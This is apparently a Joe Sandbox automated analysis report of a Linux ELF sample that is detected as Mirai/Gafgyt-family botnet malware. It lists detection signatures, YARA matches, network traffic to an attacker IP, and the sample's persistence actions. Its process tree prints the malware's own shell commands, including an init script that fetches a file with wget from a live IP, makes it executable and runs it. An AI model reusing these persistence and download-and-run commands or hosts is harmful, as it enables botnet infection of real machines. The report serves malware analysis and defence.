Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:x86_32.nn.elf
Analysis ID:1580339
MD5:3f1efbfbb79821f4bd17c6a3eff17aa6
SHA1:a5dfcdc1874352b921f819cd6f39beef6f7b3c79
SHA256:97cbb9e7d92cfaeb3173bc135b4459d4b91d1b5cb69dd7d61ee830c239545565
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to set the executable flag
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1580339
Start date and time:2024-12-24 10:42:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_32.nn.elf
Detection:MAL
Classification:mal84.spre.troj.evad.linELF@0/9@2/0
  • VT rate limit hit for: x86_32.nn.elf
Command:/tmp/x86_32.nn.elf
PID:5444
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_32.nn.elf (PID: 5444, Parent: 5368, MD5: 3f1efbfbb79821f4bd17c6a3eff17aa6) Arguments: /tmp/x86_32.nn.elf
    • sh (PID: 5454, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 5466, Parent: 5454)
      • systemctl (PID: 5466, Parent: 5454, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 5483, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 5484, Parent: 5483)
      • chmod (PID: 5484, Parent: 5483, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 5485, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 5486, Parent: 5485)
      • ln (PID: 5486, Parent: 5485, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 5487, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 5488, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 5489, Parent: 5488)
      • chmod (PID: 5489, Parent: 5488, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 5490, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 5491, Parent: 5490)
      • mkdir (PID: 5491, Parent: 5490, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 5492, Parent: 5444, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 5493, Parent: 5492)
      • ln (PID: 5493, Parent: 5492, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 5453, Parent: 802)
  • dumpe2fs (PID: 5453, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5481, Parent: 5480)
  • snapd-env-generator (PID: 5481, Parent: 5480, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 5506, Parent: 802)
  • dumpe2fs (PID: 5506, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 5562, Parent: 802)
  • dumpe2fs (PID: 5562, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
x86_32.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_32.nn.elfLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
    • 0xe7a8:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
    x86_32.nn.elfLinux_Trojan_Mirai_fa3ad9d0unknownunknown
    • 0x4988:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    • 0x4c5b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    • 0x5945:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
    x86_32.nn.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
    • 0x5a40:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
    x86_32.nn.elfLinux_Trojan_Mirai_5f7b67b8unknownunknown
    • 0xf3ab:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
    Click to see the 4 entries
    SourceRuleDescriptionAuthorStrings
    5444.1.0000000008048000.000000000805b000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      5444.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Gafgyt_5bf62ce4unknownunknown
      • 0xe7a8:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
      5444.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Mirai_fa3ad9d0unknownunknown
      • 0x4988:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x4c5b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      • 0x5945:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
      5444.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x5a40:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      5444.1.0000000008048000.000000000805b000.r-x.sdmpLinux_Trojan_Mirai_5f7b67b8unknownunknown
      • 0xf3ab:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
      Click to see the 5 entries
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: x86_32.nn.elfReversingLabs: Detection: 21%
      Source: x86_32.nn.elfJoe Sandbox ML: detected
      Source: x86_32.nn.elfString: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginnfstftpmallocwaitpidw/etc/motd%s
      Source: global trafficTCP traffic: 192.168.2.13:44546 -> 94.156.227.234:38242
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: x86_32.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.30.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
      Source: x86_32.nn.elf, 5444.1.00000000ffae6000.00000000ffb07000.rw-.sdmpString found in binary or memory: http://94.156.227.233/lol.sh
      Source: x86_32.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

      System Summary

      barindex
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: getinfo xxx/proc/self/exe(deleted)/proc/%s/exe/proc/..%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.2342surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/.socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/mnt/sys/boot/media/srv/sbin/etc/dev/telnethttpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpy
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: x86_32.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
      Source: 5444.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
      Source: classification engineClassification label: mal84.spre.troj.evad.linELF@0/9@2/0

      Persistence and Installation Behavior

      barindex
      Source: /tmp/x86_32.nn.elf (PID: 5444)File: /etc/profileJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5444)File: /etc/rc.localJump to behavior
      Source: /usr/bin/ln (PID: 5486)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
      Source: /usr/bin/ln (PID: 5493)File: /etc/rc.d/S99sh -> /etc/init.d/shJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5444)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5484)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /usr/bin/chmod (PID: 5489)File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5283/cmdlineJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5540/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5562/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5520/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5521/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5519/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5533/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5599/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5610/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5534/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5611/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5535/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5612/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5536/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5515/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5537/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5538/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5539/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5594/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5595/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5530/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5596/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5531/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5597/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5532/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5598/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5607/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/1/cmdlineJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5608/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5609/statusJump to behavior
      Source: /tmp/x86_32.nn.elf (PID: 5496)File opened: /proc/5522/statusJump to behavior
